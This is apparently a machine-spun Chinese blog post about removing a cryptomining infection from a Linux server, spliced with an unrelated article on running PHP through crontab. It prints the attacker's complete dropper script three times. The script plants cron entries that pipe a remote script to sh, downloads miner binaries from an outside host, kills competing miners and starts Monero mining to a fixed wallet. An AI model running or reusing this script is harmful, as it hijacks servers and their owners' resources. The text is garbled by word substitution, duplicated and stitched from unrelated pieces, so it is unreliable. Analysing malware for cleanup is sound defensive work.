点进入的大旨都是境遇liunx变矿机的同伴吧(cpu运载300%)
卡的连终端都很难打开
开下去未来指示 大意是, 到xxx网站给钱了事, 可是基本那几个网站基本也上不去,
要么是暴力破解, 要么是由此 redis 6379端口
详情精通redis安全漏洞

服务器LIUNX之怎么样化解矿机难点,服务器liunx消除矿

点进入的中央都以碰见liunx变矿机的伴儿吧(cpu运载300%)
卡的连终端都很难打开
开下来之后指示 粗心是, 到xxx网站给钱了事, 可是基本这几个网站为主也上不去,
要么是暴力破解, 要么是通过 redis 6379端口 详情精通redis安全漏洞

遇见那种难点势必:

  • 先要把突然冒出的一塌糊涂的占cpu过高的进程kill -stop pid 暂停掉,
    不要尝试直接kill -9 pid
  • cd /etc/cron 查看定时职分 若是在/var/spool/cron那中间也看下
  • 不法的定时职责 内容几乎是如此的
    */5 * * * * curl -fsSL http://www.hacker.com/ltc/minerd/pm.sh | sh
    意思很了然了, 前边的*/5 * * * * 大家很眼熟吧
    curl 是liunx上效仿 浏览器请求的命令 -fsSl 大约意思就是甚都不显得,
    你见到下载音信 | sh 下载后运维
    来看下脚本内容
  • export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

    echo "*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0223 | sh" > /var/spool/cron/root
    mkdir -p /var/spool/cron/crontabs
    echo "*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0223 | sh" > /var/spool/cron/crontabs/root
    
    if [ ! -f "/tmp/ddg.223" ]; then
        curl -fsSL http://www.haveabitchin.com/ddg.$(uname -m) -o /tmp/ddg.223
    fi
    chmod +x /tmp/ddg.223 && /tmp/ddg.223
    
    CleanTail()
    {
        ps auxf|grep -v grep|grep /tmp/duckduckgo|awk '{print $2}'|xargs kill -9
        ps auxf|grep -v grep|grep "/usr/bin/cron"|awk '{print $2}'|xargs kill -9
        ps auxf|grep -v grep|grep "/opt/cron"|awk '{print $2}'|xargs kill -9
        ps auxf|grep -v grep|grep "/usr/sbin/ntp"|awk '{print $2}'|xargs kill -9
        ps auxf|grep -v grep|grep "/opt/minerd"|awk '{print $2}'|xargs kill -9
        ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
        ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
    }
    
    DoYam()
    {
        if [ ! -f "/tmp/AnXqV.yam" ]; then
            curl -fsSL http://www.haveabitchin.com/yam -o /tmp/AnXqV.yam
        fi
        chmod +x /tmp/AnXqV.yam
        /tmp/AnXqV.yam -c x -M stratum+tcp://44iuYecTjbVZ1QNwjWfJSZFCKMdceTEP5BBNp4qP35c53Uohu1G7tDmShX1TSmgeJr2e9mCw2q1oHHTC2boHfjkJMzdxumM:[email protected]:443/xmr
    }
    
    DoMiner()
    {
        if [ ! -f "/tmp/AnXqV" ]; then
            curl -fsSL http://www.haveabitchin.com/minerd -o /tmp/AnXqV
        fi
        chmod +x /tmp/AnXqV
        /tmp/AnXqV -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 44iuYecTjbVZ1QNwjWfJSZFCKMdceTEP5BBNp4qP35c53Uohu1G7tDmShX1TSmgeJr2e9mCw2q1oHHTC2boHfjkJMzdxumM -p x
    }
    
    DoMinerNoAes()
    {
        if [ ! -f "/tmp/AnXqV.noaes" ]; then
            curl -fsSL http://www.haveabitchin.com/minerd.noaes -o /tmp/AnXqV.noaes
        fi
        chmod +x /tmp/AnXqV.noaes
        /tmp/AnXqV.noaes -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 44iuYecTjbVZ1QNwjWfJSZFCKMdceTEP5BBNp4qP35c53Uohu1G7tDmShX1TSmgeJr2e9mCw2q1oHHTC2boHfjkJMzdxumM -p x
    }
    
    ps auxf|grep -v grep|grep "4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "47sghzufGhJJDQEbScMCwVBimTuq6L5JiRixD8VeGbpjCTA12noXmi4ZyBZLc99e66NtnKff34fHsGRoyZk3ES1s1V4QVcB"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "AnXqV" || DoMiner
    ps auxf|grep -v grep|grep "AnXqV" || DoYam
    ps auxf|grep -v grep|grep "AnXqV" || DoMinerNoAes
    

     

  • 最后 到 /tmp/中删去所有的文书 完全没什么 记得用ll -a
    看下隐藏的文件, 也要删掉

多么了然没错的

 

点进来的大旨都以碰见liunx变矿机的伴儿吧(cpu运载300%)
卡的连终端都很难打开 开下来…

点进入的骨干都以碰见liunx变矿机的伙伴吧(cpu运载300%)
卡的连终端都很难打开
开下来之后提醒 马虎是, 到xxx网站给钱了事, 不过基本那一个网站为主也上不去,
要么是暴力破解, 要么是透过 redis 6379端口
详情明白redis安全漏洞

本文分析了crontab不可以实施php的化解方法。分享给我们供我们参考,具体如下:

遇见那种难题势必:

遇上那种难点肯定:

服务器LIUNX之怎么着消除矿机难题,crontab不能履行php的缓解办法。用crontab跑php程序时,怎样去调节,各人有各人的章程。我也有套方法,看一下,作者是何等消除crontab执行不断php程序那个标题标。

  • 先要把突然冒出的乌烟瘴气的占cpu过高的进程kill -stop pid 暂停掉,
    不要尝试直接kill -9 pid
  • cd /etc/cron 查看定时义务 假若在/var/spool/cron那其中也看下
  • 私自的定时职分 内容大致是那般的
    */5 * * * * curl -fsSL http://www.hacker.com/ltc/minerd/pm.sh | sh
    意思很理解了, 前边的*/5 * * * * 我们很熟谙吧
    curl 是liunx上模仿 浏览器请求的命令 -fsSl
    大致意思就是什么都不呈现, 你看到下载消息 | sh 下载后运营
    来看下脚本内容
  • export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

    echo "*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0223 | sh" > /var/spool/cron/root
    mkdir -p /var/spool/cron/crontabs
    echo "*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0223 | sh" > /var/spool/cron/crontabs/root
    
    if [ ! -f "/tmp/ddg.223" ]; then
        curl -fsSL http://www.haveabitchin.com/ddg.$(uname -m) -o /tmp/ddg.223
    fi
    chmod +x /tmp/ddg.223 && /tmp/ddg.223
    
    CleanTail()
    {
        ps auxf|grep -v grep|grep /tmp/duckduckgo|awk '{print $2}'|xargs kill -9
        ps auxf|grep -v grep|grep "/usr/bin/cron"|awk '{print $2}'|xargs kill -9
        ps auxf|grep -v grep|grep "/opt/cron"|awk '{print $2}'|xargs kill -9
        ps auxf|grep -v grep|grep "/usr/sbin/ntp"|awk '{print $2}'|xargs kill -9
        ps auxf|grep -v grep|grep "/opt/minerd"|awk '{print $2}'|xargs kill -9
        ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
        ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
    }
    
    DoYam()
    {
        if [ ! -f "/tmp/AnXqV.yam" ]; then
            curl -fsSL http://www.haveabitchin.com/yam -o /tmp/AnXqV.yam
        fi
        chmod +x /tmp/AnXqV.yam
        /tmp/AnXqV.yam -c x -M stratum+tcp://44iuYecTjbVZ1QNwjWfJSZFCKMdceTEP5BBNp4qP35c53Uohu1G7tDmShX1TSmgeJr2e9mCw2q1oHHTC2boHfjkJMzdxumM:x@xmr.crypto-pool.fr:443/xmr
    }
    
    DoMiner()
    {
        if [ ! -f "/tmp/AnXqV" ]; then
            curl -fsSL http://www.haveabitchin.com/minerd -o /tmp/AnXqV
        fi
        chmod +x /tmp/AnXqV
        /tmp/AnXqV -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 44iuYecTjbVZ1QNwjWfJSZFCKMdceTEP5BBNp4qP35c53Uohu1G7tDmShX1TSmgeJr2e9mCw2q1oHHTC2boHfjkJMzdxumM -p x
    }
    
    DoMinerNoAes()
    {
        if [ ! -f "/tmp/AnXqV.noaes" ]; then
            curl -fsSL http://www.haveabitchin.com/minerd.noaes -o /tmp/AnXqV.noaes
        fi
        chmod +x /tmp/AnXqV.noaes
        /tmp/AnXqV.noaes -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 44iuYecTjbVZ1QNwjWfJSZFCKMdceTEP5BBNp4qP35c53Uohu1G7tDmShX1TSmgeJr2e9mCw2q1oHHTC2boHfjkJMzdxumM -p x
    }
    
    ps auxf|grep -v grep|grep "4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "47sghzufGhJJDQEbScMCwVBimTuq6L5JiRixD8VeGbpjCTA12noXmi4ZyBZLc99e66NtnKff34fHsGRoyZk3ES1s1V4QVcB"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "AnXqV" || DoMiner
    ps auxf|grep -v grep|grep "AnXqV" || DoYam
    ps auxf|grep -v grep|grep "AnXqV" || DoMinerNoAes
    

     

  • 最后 到 /tmp/中删去所有的公文 完全没什么 记得用ll -a
    看下隐藏的文书, 也要删掉

  • 先要把突然出现的杂乱无章的占cpu过高的进程kill -stop pid 暂停掉,
    不要品味直接kill -9 pid
  • cd /etc/cron 查看定时职务 借使在/var/spool/cron那之中也看下
  • 地下的定时职责 内容大概是这样的
    */5 * * * * curl -fsSL http://www.hacker.com/ltc/minerd/pm.sh | sh
    情趣很显眼了, 前边的*/5 * * * * 大家很熟识吧
    curl 是liunx上模拟 浏览器请求的命令 -fsSl
    大约意思就是什么都不出示, 你看到下载消息 | sh 下载后运转
    来看下脚本内容
  • 澳门金沙国际,export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

    echo "*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0223 | sh" > /var/spool/cron/root
    mkdir -p /var/spool/cron/crontabs
    echo "*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0223 | sh" > /var/spool/cron/crontabs/root
    
    if [ ! -f "/tmp/ddg.223" ]; then
        curl -fsSL http://www.haveabitchin.com/ddg.$(uname -m) -o /tmp/ddg.223
    fi
    chmod +x /tmp/ddg.223 && /tmp/ddg.223
    
    CleanTail()
    {
        ps auxf|grep -v grep|grep /tmp/duckduckgo|awk '{print $2}'|xargs kill -9
        ps auxf|grep -v grep|grep "/usr/bin/cron"|awk '{print $2}'|xargs kill -9
        ps auxf|grep -v grep|grep "/opt/cron"|awk '{print $2}'|xargs kill -9
        ps auxf|grep -v grep|grep "/usr/sbin/ntp"|awk '{print $2}'|xargs kill -9
        ps auxf|grep -v grep|grep "/opt/minerd"|awk '{print $2}'|xargs kill -9
        ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
        ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
    }
    
    DoYam()
    {
        if [ ! -f "/tmp/AnXqV.yam" ]; then
            curl -fsSL http://www.haveabitchin.com/yam -o /tmp/AnXqV.yam
        fi
        chmod +x /tmp/AnXqV.yam
        /tmp/AnXqV.yam -c x -M stratum+tcp://44iuYecTjbVZ1QNwjWfJSZFCKMdceTEP5BBNp4qP35c53Uohu1G7tDmShX1TSmgeJr2e9mCw2q1oHHTC2boHfjkJMzdxumM:x@xmr.crypto-pool.fr:443/xmr
    }
    
    DoMiner()
    {
        if [ ! -f "/tmp/AnXqV" ]; then
            curl -fsSL http://www.haveabitchin.com/minerd -o /tmp/AnXqV
        fi
        chmod +x /tmp/AnXqV
        /tmp/AnXqV -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 44iuYecTjbVZ1QNwjWfJSZFCKMdceTEP5BBNp4qP35c53Uohu1G7tDmShX1TSmgeJr2e9mCw2q1oHHTC2boHfjkJMzdxumM -p x
    }
    
    DoMinerNoAes()
    {
        if [ ! -f "/tmp/AnXqV.noaes" ]; then
            curl -fsSL http://www.haveabitchin.com/minerd.noaes -o /tmp/AnXqV.noaes
        fi
        chmod +x /tmp/AnXqV.noaes
        /tmp/AnXqV.noaes -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 44iuYecTjbVZ1QNwjWfJSZFCKMdceTEP5BBNp4qP35c53Uohu1G7tDmShX1TSmgeJr2e9mCw2q1oHHTC2boHfjkJMzdxumM -p x
    }
    
    ps auxf|grep -v grep|grep "4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "47sghzufGhJJDQEbScMCwVBimTuq6L5JiRixD8VeGbpjCTA12noXmi4ZyBZLc99e66NtnKff34fHsGRoyZk3ES1s1V4QVcB"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "AnXqV" || DoMiner
    ps auxf|grep -v grep|grep "AnXqV" || DoYam
    ps auxf|grep -v grep|grep "AnXqV" || DoMinerNoAes
    

     

  • 最后 到 /tmp/中去除所有的公文 完全没什么 记得用ll -a
    看下隐藏的文书, 也要删掉

一、php文件有没有实施权限

多多通晓没错的

万般驾驭没错的

复制代码 代码如下:

 

 

[root@linux cron]# ls -al |grep del

 -rwxr-xr-x  1 zwh  ftpgroup  494 10-20 16:42 del_redis.php 
假设没有X,表达没有履行权限,当然也实施不断。假设你不精通您登录的用户所在的组是还是不是有权力,直接给所有组都加上权限就行了。方法如下:

复制代码 代码如下:

[root@linux cron]# chmod +x ./del_redis.php

二、假如有履行权限了,依然履行不断

涸泽而渔办法如下:

1.
在php程序里面写log(例如:error_log()那么些函数),那也是必须的,因为crontab定时进行,若是没有log,你怎么掌握程序执行的结果什么。那样大家得以因此log来查看crontab执行的气象。

2.
也可以平素在crontab里面,将执行的结果输出二个文书当中。然后在这几个文件当中查看执走势形。例如:

复制代码 代码如下:

*/10 * * * * /usr/local/php/bin/php /var/www/cron/del_redis.php
>> /home/zhangy/cron.txt

3.
用crontab来执行php,是不走apache,nginx,所以$_SERVER,$_ENV那类变量根本用持续。所以检查一下php代码中有没有那类变量,如若有拿掉。

  1. php的相对路径难点

因为有思考向来在做怪,那几个标题也是最不难忽略的。

复制代码 代码如下:

include_once’./mysql.php’;

当php代码中,用的是绝对路径时,唯有进入到不行目录下执行/usr/local/php/bin/php
/var/www/cron/level_rank.php才能奏效。这几个标题本身蒙受过至少二次,不过再相见时要么想不起来。

化解方法如下:

复制代码 代码如下:

*/10 * * * * cd /var/www/cron && /usr/local/php/bin/php
/var/www/cron/level_rank.php

大概 在php代码中用相对路径

越多关于PHP相关内容感兴趣的读者可查看本站专题:《PHP基本语法入门教程》及《php面向对象程序设计入门教程》

期待本文所述对大家PHP程序设计有着支持。

您只怕感兴趣的稿子:

  • 何以利用Linux的Crontab定时举办PHP脚本的点子
  • linux使用crontab完成PHP执行部署定时义务
  • 利用linux命令crontab间隔时间执行其它命令
  • linux crontab
    已毕每秒执行的实例
  • crontab每10秒执行五遍的落到实处方式
  • Centos
    7下利用crontab定时实施任务详解
  • linux下定时举办任务的章程及crontab
    用法表明(收集整理)
  • 详解Unix/Linux中周期执行命令Crontab命令
  • Ubuntu系统下用Crontab命令定时执行PHP文件详解
  • crontab落成每隔多少天执行三次剧本的二种方法

相关文章